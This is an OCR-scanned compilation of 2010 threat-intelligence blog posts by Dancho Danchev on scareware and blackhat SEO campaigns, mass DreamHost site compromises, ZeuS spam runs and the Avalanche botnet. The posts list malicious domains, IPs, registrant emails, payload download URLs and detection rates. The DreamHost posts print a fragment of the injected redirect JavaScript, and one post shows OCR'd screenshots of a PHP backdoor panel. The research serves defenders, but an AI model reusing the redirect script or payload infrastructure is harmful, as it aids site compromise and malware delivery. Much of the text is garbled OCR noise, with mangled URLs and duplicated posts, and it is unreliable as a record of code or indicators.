[9]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding : 


* The compromised/mis-configured web sites participating in this latest blackhat SEO cam- 
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paign are surprisingly redirecting to a-n-d-the.com /wtr/router.php - 95.168.177.35 - 
Email: bulk@spam.lv - AS28753 NETDIRECT AS NETDIRECT Frankfurt, DE if the http re- 
ferrer condition isn’t met. This very same domain - back then parked at INTERCAGE- 
NETWORK-GROUP2 - was also used in the same fashion in March, 2008’s massive blackhat 
SEO campaigns serving scareware. 


Not only is a-n-d-the.com /wtr/router.php (95.168.177.35) (Web [10]sessions of the URL 
acting as [11]a redirector), the exact same URL that was in circulating in 2008, residing on the 
Russian Business Network’s netblock back then, still active, but also, it’s currently redirecting 
to - if the campaign’s evasive conditions are met - to www4.zaikob8.xorg.pl/?uid=213 &pid=3 
&ttl=31345701120 - 217.149.251.12. 


What this proves is fairly simple - with or without the Russian Business Network the way 
we used to know it, it’s customers simply moved on to the competition, whereas the original 
Russian Business Network simply diversified its netblocks ownership. 


Related posts: 
[12]ZDNet Asia and TorrentReactor IFRAME-ed 
[13]Wired.com and History.com Getting RBN-ed 


[14]Massive IFRAME SEO Poisoning Attack Continuing 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 


http: //blogs. paretologic.com/malwarediaries/index.php/2010/05/10/torrentreactor-net-leads-to-exploit/ 


. http: //ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html 
. http: //ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed. html 
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13. http://ddanchev.blogspot .com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 
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14. http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 
15. http://ddanchev. blogspot .com/ 
16. http://twitter.com/danchodanche 


6.5.7 Dissecting the Mass DreamHost Sites Compromise (2010-05-11 22:19) 


System Tasks 
Q View system nformaton 
0) Add of remove prog ams 
oO Change 2 setting: 


Other Places 
a My Network Places 
a My Documents 

& Aered Documents 


o Control Panel 


Sopnere 6 softwere, whech can gether mformeton fom user's computer 
Drought Imernet comecton and sed fer to eater 


ae . Gather 
formation can be passwords, e-nal adresses ard al thot data, which 6 
important for you. 


Yet another [1]mass sites compromise is currently taking place, this time targeting DreamHost 
customers, courtesy of the same gang behind the U.S Treasury/GoDaddy/NetworkSolutions 
mass compromise campaigns. 


What’s particularly interesting about the campaign, is not just [2]the Hilary Kneber con- 
nection, but also, the fact that a key command and control domain part of the Koobface 
botnet, is residing within the same AS where the nameservers, and one of actual domains 
(kdjkfjskdfjlskdjf.com/ kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI) used in previous 
campaigns are. 


These gangs are either aware of one another’s existence, are the exact same gang do- 


ing basic evasive practices on multiple fronts, or are basically customers of the same 
cybercrime-friendly hosting service provider. 
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name, Value,expiredays) { 


String()): 


eoeenenre OH = 


10 ¢. length>0) 


12 73 ent.cookic. index 


18 -Substring(c_start,c_end)): 


if (name=="'"'") { 


setc 


2td.net/ ?p=pS2dcU¥pkbrenlinc3 KomNToKV1iqH¥nG2 
ce(url); 


SBRsH8sRRsggres 
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The DreamHost campaign structure, including the detection rates, phone back locations, is as 
follows: 

- zettapetta.com/js.php - 109.196.143.56 - Email: hilarykneber@yahoo.com 

- www4.suitcase52td.net/?p= - 78.46.218.249 - Email: gkook@checkjemail.nl 

- www 1L.realsafe-23.net - 209.212.149.17 - Email: gkook@checkjemail.nl 
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* oklahomacitycom.com 


hostmaster.oklahomacitycom.com 
hostmaster.stablednsstuff.com 
kdjkijskdfjlskdjf.com 


mail.oklahomacitycom.com 91.188.32.0/19 ——4S-ge As6s51 


91.188.59.98 


ns1l.oklahomacitycom.com 
ns2.oklahomacitycom.com 
oklahomacitycom.com 


stablednsstuff.com 


Active client-side exploits serving, redirector domains parked on the same IP 109.196.143.56: 
zettapetta.com - 109.196.143.56, AS39150, VLTELECOM-AS VLineTelecom LLC Moscow, 
Russia - Email: hilarykneber@yahoo.com 

yahoo-statistic.com - Email: hilarykneber@yahoo.com 

primusdns.ru - Email: samm _87@email.com 

freehost21.tw - Email: hilarykneber@yahoo.com 

alert35.com.tw - Email: admin@zalert35.com.tw 

indesignstudioinfo.com - Email: hilarykneber@yahoo.com 


Historically, the following domains were also parked on the same IP 109.196.143.56: 
bananajuice21.net - Email: hilarykneber@yahoo.com 

winrar392.net - Email: lacyjerry1958@gmail.com 

best-soft-free.com - Email: lacyjerryl1958@gmail.com 

setyupdate.com - Email: admin@setyupdate.com 


Detection rate for the scareware pushed in the campaign: 

- packupdate build107 2060.exe - [3]TROJ FRAUD.SMDV; Packed.Win32.Krap.an - Result: 
8/41 (19.52 %) with the sample phoning back to: 

update2.keep-insafety.net - 94.228.209.221 - Email: gkook@checkjemail.nl 
updatel.myownguardian.com - 74.118.194.78 - Email: gkook@checkjemail.nl 
securel.saefty-guardian.com - 94.228.220.112 - Email: gkook@checkjemail.nl 
report.zoneguardiand.net - 91.207.192.25 - Email: gkook@checkjemail.nl 
report.land-protection.com - 91.207.192.24 - Email: gkook@checkjemail.nl 
www5.our-security-engine.net - 94.228.220.111 - Email: gkook@checkjemail.nl 
report1.stat-mx.xorg.pl 

updatel1.securepro.xorg.pl 


Name servers of notice parked at 91.188.59.98, AS6851, BKCNET "SIA" IZZI: 
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nsl1.oklahomacitycom.com 
ns2.oklahomacitycom.com 


What’s so special about [4]AS6851, BKCNET "SIA" IZZI anyway? It’s the Koobface gang 
connection in the face of urodinam.net, which is also hosted within AS6851, currently respond- 
ing to 91.188.59.10. More details on urodinam.net: 


¢ [5]Koobface Botnet’s Scareware Business Model 


¢ [6]Koobface Botnet’s Scareware Business Model - Part Two 


Moreover, on the exact same IP where Koobface gang’s urodinam.net is parked, we also have 
the currently active lzabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com, serving 
client side exploits using the Yes Malware Exploitation kit - 91.188.59.10 /temp/cache/PDF. php; 
admin panel at: 1zabslwvn538n4i5tcjl.com /temp/admin/index.php 


YES Exploit System 


Detection rates for the malware pushed from the same IP where a key Koobface botnet’s C &C 
is hosted: 
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- 55.pdf - [7]JS:Pdfka-gen; Exploit.JS.Pdfka.blf - Result: 23/41 (56.1 %) 
- dm.exe - [8] Trojan:Win32/Alureon.CT; Mal/TDSSPack-Q - Result: 36/41 (87.81 %) 
- wsc.exe - [9]Net-Worm.Win32.Koobface; Trojan.FakeAV - Result: 36/41 (87.81 %) 


The same michaeltycoon@gmail.com used to register lzabslwvn538n4i5tcjl.com, was 
also profiled in the "[10]Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of 
the Koobface Gang" assessment. 


Given that enough historical OSINT is available, the cybercrime ecosystem can be a pretty 
small place. 


Related posts: 

[11]U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs 
Compromise 

[12]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

[13]Dissecting the WordPress Blogs Compromise at Network Solutions 


Hilary Kneber related activity: 

[14]The Kneber botnet - FAQ 

[15]Celebrity-Themed Scareware Campaign Abusing DocStoc 
[16]Dissecting an Ongoing Money Mule Recruitment Campaign 
[17]Keeping Money Mule Recruiters on a Short Leash - Part Four 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him 
[19]on Twitter. 


9. ttp://www.virustotal.com/analisis/5b0ddiaa5e1f84d044ac2c381a78144b988cd6d314a9b0ebc862449e9343f 499- 12736 
10. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 


12. 

13 
15, 
16 


18. http://ddanchev. blogspot .com/ 
19. http://twitter .com/danchodanche 
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6.5.8 Dissecting the Mass DreamHost Sites Compromise (2010-05-11 22:19) 


System Tasks 
Q View gyitem information 
no) Add of remove prog ans 
G> Ceres 2 settrce 
To help protect your computer, Wiedows Web Securi 
NY have detected Trojans and ready to remove them 
Other Places 
t >) My Network Places 
oOo” Cocumerts 
Oo Srared Documents 


Control Pane! 
o 


Spyware G softnare, mich can gather mformeton fom user's computer 
rough Imemnet comecton ard send ther to its creater. Gather 


formation can be passwords, e-mnal adresses and all thet date, which o 
important for you: 


Yet another [1]mass sites compromise is currently taking place, this time targeting DreamHost 
customers, courtesy of the same gang behind the U.S Treasury/GoDaddy/NetworkSolutions 
mass compromise campaigns. 


What’s particularly interesting about the campaign, is not just [2]the Hilary Kneber con- 
nection, but also, the fact that a key command and control domain part of the Koobface 
botnet, is residing within the same AS where the nameservers, and one of actual domains 
(kdjkfjskdfjlskdjf.com/ kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI) used in previous 
campaigns are. 


These gangs are either aware of one another’s existence, are the exact same gang do- 
ing basic evasive practices on multiple fronts, or are basically customers of the same 
cybercrime-friendly hosting service provider. 
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ifunction setCookie(c ne, Value, expiredays) { 

var exdate= te(); 

exdate.setDat exdate.getDate() +expiredays); 

aoc nt } name+ "=" 

( (expired n 1) Cob bl pt res te.toGNTString()): 


eenrenre von-= 


if (document.cookie. length>0) 


start=document.cookie.indexOf(c_name + "="); 
tem) 


ml 


2 ( Start); 
(c_end*"-1) c_end« e cookie. length: 


t 
eturn unescape (documen ¢.substring start,c end)): 


var url="hetp://¥ . t seS2 -net/ ?p* cUpkbmnlinc3 KomNToKV1iqH¥n si Yk2idZms2BVxgt3D43D" 
window.top. location.rep 


B2SsREIszges@gn 


The DreamHost campaign structure, including the detection rates, phone back locations, 
is as follows: 


- zettapetta.com/js.php - 109.196.143.56 - Email: hilarykneber@yahoo.com 
- www4.suitcase52td.net/?p= - 78.46.218.249 - Email: gkook@checkjemail.nl 


- www 1.realsafe-23.net - 209.212.149.17 - Email: gkook@checkjemail.nl 
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" oklahomacitycom.com 


hostmaster.oklahomacitycom.com 


hostmaster.stablednsstuff.com 


kdjkijskdfjlskdif.com 


mail.oklahomacitycom.com 91.188.32.0/19 ——“S-pe As6e51 


91.188.59.98 


nsl.oklahomacitycom.com 
ns2.oklahomacitycom.com 
oklahomacitycom.com 


stablednsstuff.com 


Active client-side exploits serving, redirector domains parked on the same IP 109.196.143.56: 


zettapetta.com - 109.196.143.56, AS39150, VLTELECOM-AS VLineTelecom LLC Moscow, 
Russia - Email: hilarykneber@yahoo.com 


yahoo-statistic.com - Email: hilarykneber@yahoo.com 
primusdns.ru - Email: samm _87@email.com 
freehost21.tw - Email: hilarykneber@yahoo.com 
alert35.com.tw - Email: admin@zalert35.com.tw 


indesignstudioinfo.com - Email: hilarykneber@yahoo.com 


Historically, the following domains were also parked on the same IP 109.196.143.56: 
bananajuice21.net - Email: hilarykneber@yahoo.com 
winrar392.net - Email: lacyjerry1958@gmail.com 


best-soft-free.com - Email: lacyjerry1958@gmail.com 
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setyupdate.com - Email: admin@setyupdate.com 


Detection rate for the scareware pushed in the campaign: 


- packupdate build107 2060.exe - [3]TRO) _FRAUD.SMDV; Packed.Win32.Krap.an - Re- 
sult: 8/41 (19.52 %) with the sample phoning back to: 


update2.keep-insafety.net - 94.228.209.221 - Email: gkook@checkjemail.nl 
updatel.myownguardian.com - 74.118.194.78 - Email: gkook@checkjemail.nl 
securel.saefty-guardian.com - 94.228.220.112 - Email: gkook@checkjemail.nl 
report.zoneguardiland.net - 91.207.192.25 - Email: gkook@checkjemail.nl 
report.land-protection.com - 91.207.192.24 - Email: gkook@checkjemail.nl 
www5.our-security-engine.net - 94.228.220.111 - Email: gkook@checkjemail.nl 
report1.stat-mx.xorg.pl 


updatel.securepro.xorg.pl 


Name servers of notice parked at 91.188.59.98, AS6851, BKCNET "SIA" IZZI: 
ns1.oklahomacitycom.com 


ns2.oklahomacitycom.com 


What’s so special about [4J]AS6851, BKCNET "SIA" IZZI anyway? It’s the Koobface gang 
connection in the face of urodinam.net, which is also hosted within AS6851, currently respond- 
ing to 91.188.59.10. More details on urodinam.net: 


¢« [5]Koobface Botnet’s Scareware Business Model 


¢ [6]Koobface Botnet’s Scareware Business Model - Part Two 


Moreover, on the exact same IP where Koobface gang’s urodinam.net is parked, we also have 
the currently active lzabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com, serving 
client side exploits using the Yes Malware Exploitation kit - 91.188.59.10 /temp/cache/PDF.php; 
admin panel at: lzabslwvn538n4i5tcjl.com /temp/admin/index.php 
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YES Exploit System 


Detection rates for the malware pushed from the same IP where a key Koobface bot- 
net’s C &C is hosted: 


- 55.pdf - [7]JS:Pdfka-gen; Exploit.JS.Pdfka.blf - Result: 23/41 (56.1 %) 
- dm.exe - [8]Trojan:Win32/Alureon.CT; Mal/TDSSPack-Q - Result: 36/41 (87.81 %) 


- wsc.exe - [9]Net-Worm.Win32.Koobface; Trojan.FakeAV - Result: 36/41 (87.81 %) 


The same michaeltycoon@gmail.com used to register lzabslwvn538n4i5tcjl.com, was 
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also profiled in the "[10]Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of 
the Koobface Gang" assessment. 


Given that enough historical OSINT is available, the cybercrime ecosystem can be a pretty 
small place. 


Related posts: 


[11]U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs 
Compromise 


[12]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 


[13]Dissecting the WordPress Blogs Compromise at Network Solutions 


Hilary Kneber related activity: 

[14]The Kneber botnet - FAQ 

[15]Celebrity-Themed Scareware Campaign Abusing DocStoc 
[16]Dissecting an Ongoing Money Mule Recruitment Campaign 


[17]Keeping Money Mule Recruiters on a Short Leash - Part Four 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him 
[19]on Twitter. 


ttp://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/ 


1. 
2. http: //ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs.htm 
3. 


ttp://www.virustotal.com/analisis/406aa6de1351488a81f9150b9b378f 6f826255f4f 3f d49cef 95cb634b9 1e2d21- 12736 


ttps://zeustracker.abuse.ch/monitor.php?host=91.188.59.50 


4. 
5, http://ddanchey blogspot. con/2009/06 /koobface-botnets-scarevare-business. btn 
6. hetp://adanchev blogspot .con/2009/11/koobface-botnets-acarevare-business. html 
7 
08288 
5 
08306 
9 
10. http://ddanchev. blogspot . com/2010/02/diverse-portfolio-of-scarewareblackhat html 

3409 


. http: //ddanchev.blogspot .com/2010/05/us-treasury-site-compromise-linked-to.htm 


12. http://ddanchev.blogspot .com/2010/04/godaddys-mass-wordpress-blogs.htm 
13. http: //ddanchev.blogspot .com/2010/04/dissecting-wordpress—blogs- compromise. htm 
14. bttp://www.zdnet.com/blog/security/the-kneber-botnet-faq/5508 


. http: //ddanchev. blogspot .com/2009/12/celebrity-themed-scareware-campaign_07.htm 


. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.htm 


17. http: //ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short .htm 


18. http://ddanchev.blogspot.com/ 
19. http://twitter.com/danchodanche 


6.5.9 Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns 
(2010-05-13 20:16) 


My Resume 2 
15,exe 


What do the recently spamvertised [1]"Thank you for buying iTunes Gift Certificate!" and the 
"Look at my CV!" themed malware campaigns have in common? 


It’s the fact that they’ve been launched by the same individual/gang. What’s particu- 
larly interesting about the campaign, is that it’s relying on a currently compromised web 
server, with a publicly accessible [2]PHP based backdoor. This exact [3]same approach is also 
used by the Koobface gang on a large scale, in order to efficiently [4]control the compromised 
sites involved in their Facebook spreading campaigns. 


Moreover, upon successful infection the campaign is not just pushing scareware, but evi- 
dence based on the binaries found within the directory indicate a ZeuS crimeware binary 
has been in circulation for a while. Let’s dissect the campaign, and establish the obvious 
connection. 


Detection rates, phone back locations 
- iTunes certificate 497.exe - [5]TrojanDropper:Win32/Oficla.G - Result: 39/41 (95.12 %) 
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Upon execution phones back to: 
- davidopolko.ru/migel/ bb.php?v=200 &id=554905388 &b=6may &tm=3 
- jaazle.com/wp-includes /js/tinymce/themes/advanced/psihi.exe 


- phishi.exe - [6]Gen:Trojan.Heur.TP.bmX@bins2Eb; Backdoor.Win32.Protector.ao - Result: 
24/41 (58.54 %) ultimately dropping scareware on the infected host. 


Both campaigns are related, since the use the same command and control server, which is 
periodically updated with new URLs consisting of compromised sites. The detection rates, 
phone back locations for the second campaign are as follows: 


wal / 2.2.11 OpenSS /0.9.6e-fips-rhelS FrontPage/5.0.2.2635 mod_bwhiewted/ 1.4 mod_auth_passthrough/ 2.1 moc 


2 o/ 50.2. 
2-4.18-164.15.1.e85 #1 SMP Wed Mar 17 11:37:14 EDT 2010 wee 


yeqli, ftp, cert, tap, sockets 
source, system, shell_exec, pavsthra, popes, proc_open, allow _art_fopen 


- My Resume 218.exe - [7]W32/Oficla.O; Gen:Variant.Bredo.4 - Result: 17/41 (41.46 %) 


Upon executing the same phones back to the following URLs, in an attempt to drop the 
related binaries: 


- davidopolko.ru/migel/bb.php?v=200 &id=636608811 &b=12may &tm=2 - 195.78.108.201 - 
Email: vadim.rinatovich@yandex.ru 

- topcarmitsubishi.com.br /_vti_bin/ _vti adm/psi.exe - 201.76.146.215 

- davidopolko.ru /psi.exe; davidopolko.ru /setupse2010.exe 
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topcarmitsubishi.com.br appears to be a compromised site, with an open directory al- 
lowing the easier obtaining of the rest of the binaries used by the same gang/individual. 


Detection rates for the binaries within the open directory, including the dropped scare- 
ware: 

- psi.exe - [8]TrojanDownloader:Win32/Cutwail.gen!C; Backdoor.Win32.Protector.at - Result: 
17/41 (41.47 %) 

- sofgold.exe - [9]Trojan.Fakealert.14822; W32/Junkcomp.A - Result: 15/41 (36.59 %) 

- sp.exe - [10]PWS:Win32/Zbot.gen!R; a variant of Win32/Kryptik.EGZ - Result: 5/41 (12.2 %) 

- ustest.exe - [11]Net-Worm.Win32.Kolab - Result: 4/41 (9.76 %) 

- firewall.dll - [12 ]Trojan:Win32/Fakeinit; Win32/TrojanDownloader.FakeAlert.ASI - Result: 20/40 
(50 %) 

- SetupSE2010.exe - [13]W32/FakeAV.AM!genr; CoreGuardAntivirus2009 - Result: 29/41 (70.74 
%) 


OpenSsS/0.9 Se-Aps-rhetS FromtPace/S 0.2 2635 mod wired] 4 mod auth sesstty 
[phpinfo ) ( phpiet) (cow) ( mem] [ users) (top) [ delete } 
ow on om oo or 
show_sowrce, vystom, shell_exec, passthru, popen, proc_open, sllow_wrl_fopen 
2.G.18-164.15.1.015 1 SMP Wed Mar £7 11:37114 EDT 2010 1686 686 O86 GNU/Linuw 


total 444 

277719839 Grvar-ar-x 2 topoar topoar 4096 May i2 10:55 . 

787327437 Grvar-ar-x 4 topcar topoar $2 Apr 25 12132 .. 

277720099 -rw-r--Er-- i topoar topcar 373 Jul 18 2008 .Btaccess 
277719981 -rw-r--r-- 1 topoar topoar 101008 Apr ii 07:43 functions.pap 
1264079900 -rw-r--r-- 1 topoar topoar 21673 Apr 23 07115 mr_conf.pap 
1272337995 -rv-r--r-- 1 topoar topoar 26764 May 12 07159 psi.exe 
4388612963 -rv-r--r-- 1 topoar topoar $2736 May 12 07122 sofgold.exe 
277308106 -rv-r--r-- 1 topoar topoar 125952 May 12 07129 sp.exe 
5274498066 -rw-r--r-- 1 topoar topoar 110592 May i2 10:55 ustest.exe 


[rome/topcar/pubbc_htmi/_vo_be/_vo_edm Exeose 
~” 
[remenopcar/ouehc_ NW _vo_Dev_vo_adm tat fle 
~” 
[acute 3) Sencute 
- 
tea aa 
\homeftopcar/puble_htmi/_vb_bir/_vb_edm 
IP Cons .h@ 
~~ 
text ~ Find 
[rome/topcar/oubbe_ Nr _vo_Dev_vo_edm 
[*.fhe} 
” 
tt Past your Eval code 1: Vt 


| Peete 


Phone back locations, C &Cs of the 4 samples: 
[14]mystaticdatas.ru /basel/ess.cfg - 195.88.144.63, AS48984, VLAF-AS Vlaf Processing Ltd - 
Email: mail2businessman@gmail.com - [15]same email has been profiled before 
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get-money-now.net/loads.php? code=000000000048170 - 91.188.59.211, [16]AS6851, BKC- 
NET "SIA" IZZI - Email: noxim@maidsf.ru 

get-money-now.net/ firewall.dll 

get-money-now.net/cgi-bin/ware.cgi? adv=000000000048170 
mamapapalol.com/cgi-bin/get.pl? 1=000000000048170 - 88.80.4.19, AS33837, PRQ-AS - 
Email: security2guard@gmail.com 

SGTSRX.jackpotmsk.ru - FAST FLUX - Email: alskudryav@yandex.ru 

JETIHB.piterfm1.ru - FAST FLUX - Email: alskudryav@yandex.ru 

UDUMOM. bingoforus.ru - FAST FLUX - Email: alskudryav@yandex.ru 

ZMOWOE. rusradiol.ru - FAST FLUX - Email: alskudryav@yandex.ru 

funnylive2010.ru - domain part of the fast flux infrastructure - Email: kurk@sovbiz.net 
wapdodoit.ru - domain part of the fast flux infrastructure - Email: sharan812@yandex.ru 


buy-is2010.com 
buy-security-essentials.com A 
for-sunny-se.com 
for-sunny-smile.com 
mail.buy-is2010.com 
mail_buy-security-essentials.com 
mail.for-sunny-se.com 


88.80.0.0/19 ———__4S_ ge AS33837 
mail.mega-scan-pc-newl4.com 


88.80.4.19 PTR 
a host-88-80-4-19 custpraq.se 


f 


mail.megahosting10.com 


mail. red-xx-tube.net 


mail.sunny-moneyl.com 


mega-scan-pc-newl4.com 


megahosting10.com 


red-xx-tube. net 


sunny-moneyl.com 


winter-smile.com 
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Related domains parked on 88.80.4.19 (mamapapalol.com/cgi-bin/get.pl? 
1=000000000048170): 

buy-is2010.com - Email: vasya@mail.ru 
buy-security-essentials.com - Email: noxim@maidsf.ru 
for-sunny-se.com - Email: noxim@maidsf.ru 
for-sunny-smile.com - Email: vasya@mail.ru 
mega-scan-pc-new14.com - Email: noxim@maidsf.ru 
red-xxx-tube.net - Email: noxim@maidsf.ru 
sunny-moneyl1.com - Email: noxim@maidsf.ru 
winter-smile.com - Email: vasya@mail.ru 
megahosting10.com 


Updated will be posted, as soon as they switch to a new theme, introduce new moneti- 
zation tactics. 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him 
[18]on Twitter. 
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6.5.10 The Avalanche Botnet and the TROYAK-AS Connection (2010-05-13 22:14) 
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An APWG Industry Advisory 
http://www.apwa.org e info@apwa.org 
PMB 246, 405 Waltham Street, Lexington MA USA 02421 


According to the latest [1]APWG Global Phishing Survey: 


¢ But by mid-2009, phishing was dominated by one player as never before the Avalanche 
phishing operation. This criminal entity is one of the most sophisticated and damaging 
on the Internet, and perfected a mass-production system for deploying phishing sites 
and "crimeware" - malware designed specifically to automate identity theft and facilitate 
unauthorized transactions from consumer bank accounts. Avalanche was responsible for 
two-thirds (66 %) of all phishing attacks launched in the second half of 2009, and was 
responsible for the overall increase in phishing attacks recorded across the Internet." 


The [2]Avalanche botnet’s ecosystem is described by PhishLabs as: 


¢ "[3]Cutwail aka PushDo is a spamming trojan being used to send out [4]massive amounts 
of spam with links (or lures) to phishing pages or pages that ask the users to down- 
load and run programs. Those programs invariably turn out to be instances of the 
[5]Zeus/ZBot/WNSPOEM banking Trojan. There are also unrelated criminals that also use 
Zeus Trojans to steal online banking information that are not related to this set of scams. 


The Avalanche botnet is the middle-step between the spamming botnet and Trojans that 
steal banking information. It is basically a hosting platform used by the attackers. Be- 
cause the Avalanche bots act as a simple proxy, and there are thousands of them, it has 
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been exceedingly difficult to shutdown the phish pages. Instead most Anti-Phishing orga- 
nizations have focused on shutting down the domain names that were used in the phishing 
URLs." 


One of the most notable facts about the botnet, is their persistent interaction with the 
[6]TROYAK-AS cybercrime-friendly ISP, where they used to host a huge percentage of their 
ZeuS C &Cs, next to the actual client-side exploit serving iFrame domains/IPs, found on 
each and every of their phishing pages. The following chronology, exclusively details their 
client-side exploits/ZeuS crimeware serving campaigns. 


The Avalanche Botnet’s ZeuS crimeware/client-side exploit serving campaigns, in chronolog- 
ical order: 

[7]Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild 

[8]Scareware, Sinowal, Client-Side Exploits Serving Soam Campaign in the Wild 
[9]IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[10]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[11]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[12]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 
[13]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 

[14]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[15]Pushdo Injecting Bogus Swine Flu Vaccine 

[16]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 

[17]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[18]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


Related articles on TROYAK-AS, and various cybercrime trends: 
[19]TROYAK-AS: the cybercrime-friendly ISP that just won’t go away 
[20]AS-Troyak Exposes a Large Cybercrime Infrastructure 

[21]The current state of the crimeware threat - Q &A 

[22]Report: ZeuS crimeware kit, malicious PDFs drive growth of cybercrime 
[23]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 


This post has been reproduced from [24]Dancho Danchev’s blog. Follow him 
[25]Jon Twitter. 


1 cep: //uantiphishing.org/reports/1PH0, Global PhishingSurvey_ 292009. pal 
2. hep: / ows. phishlabs.con/olog/ 

3. http://www. zdnet .com/blog/security/cutwail-botnet-spamming-irs-unreported-income-themed-malware/4260 
4. htp://us.trendnicro.coa/inperia/nd/content/as/paf/threats/security1ibrary/study_of_pushdo. pif 
sftp: / owe. socurevoris .con/research/threats/zeus/"threat-zous 

6. http: //ddanchev. blogspot . com/2010/03/as50215-troyak-as-taken-offline-zeus~c. html 

7. i 

8. 

9. 


http: //ddanchev. blogspot .com/2010/03/zeus-crimewareclient-side-exploits.htm 


ttp://ddanchev. blogspot .com/2010/03/scareware-sinowal-client-side-exploits.htm 


ttp://ddanchev. blogspot .com/2010/02/irsphotoarchive-themed-zeusclient-side.htm 
10. http: //ddanchev.blogspot .com/2010/02/tax-report-themed-zeusclient-side.htm 
11. http: //ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.htm 


http: //ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam-campaign.htm 


. http: //ddanchev.blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


14. http: //ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam- campaign. htm 


. http: //ddanchev. blogspot .com/2009/12/pushdo- injecting-bogus-swine-flu. htm 


16. http: //ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.htm 
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17. http://ddanchev. blogspot .com/2009/10/ongoing-fdic-spam- campaign-serves-zeus.htm 


18. http://ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that .htm 


19. http://www.zdnet .com/blog/security/troyak-as-the-cybercrime-friendly-isp-that- just-wont-go-away/5761 


20. http://rsa.com/blog/blog_entry.aspx?id=1610 


21. http://www.zdnet .com/blog/security/the-current-state-of-the-crimeware-threat-q-a/579 


22. bttp://www.zdnet.com/blog/security/report-zeus-crimeware-kit-malicious-pdfs-drive-growth-of-cybercrime/ 
625 

23. http://www.zdnet .com/blog/security/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for- 
24. 

25. 


6.5.11 The Avalanche Botnet and the TROYAK-AS Connection (2010-05-13 22:14) 
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According to the latest [1]APWG Global Phishing Survey: 


¢ But by mid-2009, phishing was dominated by one player as never before the Avalanche 
phishing operation. This criminal entity is one of the most sophisticated and damaging 
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on the Internet, and perfected a mass-production system for deploying phishing sites 
and "crimeware" - malware designed specifically to automate identity theft and facilitate 
unauthorized transactions from consumer bank accounts. Avalanche was responsible for 
two-thirds (66 %) of all phishing attacks launched in the second half of 2009, and was 
responsible for the overall increase in phishing attacks recorded across the Internet." 


The [2]Avalanche botnet’s ecosystem is described by PhishLabs as: 


One 


"[3]Cutwail aka PushDo is a spamming trojan being used to send out [4]massive amounts 
of spam with links (or lures) to phishing pages or pages that ask the users to down- 
load and run programs. Those programs invariably turn out to be instances of the 
[5]Zeus/ZBot/WNSPOEM banking Trojan. There are also unrelated criminals that also use 
Zeus Trojans to steal online banking information that are not related to this set of scams. 


The Avalanche botnet is the middle-step between the spamming botnet and Trojans that 
steal banking information. It is basically a hosting platform used by the attackers. Be- 
cause the Avalanche bots act as a simple proxy, and there are thousands of them, it has 
been exceedingly difficult to shutdown the phish pages. Instead most Anti-Phishing orga- 
nizations have focused on shutting down the domain names that were used in the phishing 
URLs." 


of the most notable facts about the botnet, is their persistent interaction with the 


[6]TROYAK-AS cybercrime-friendly ISP, where they used to host a huge percentage of their 
ZeuS C &Cs, next to the actual client-side exploit serving iFrame domains/IPs, found on 


each 


and every of their phishing pages. The following chronology, exclusively details their 


client-side exploits/ZeuS crimeware serving campaigns. 


The Avalanche Botnet’s ZeuS crimeware/client-side exploit serving campaigns, in chronolog- 
ical order: 


[7]Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild 


[8]Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild 


[9]IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 


[10]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 


[11]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 


[12]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Ex- 
ploits 


[13]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
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[14]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
[15]Pushdo Injecting Bogus Swine Flu Vaccine 

[16]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
[17]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 


[18]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


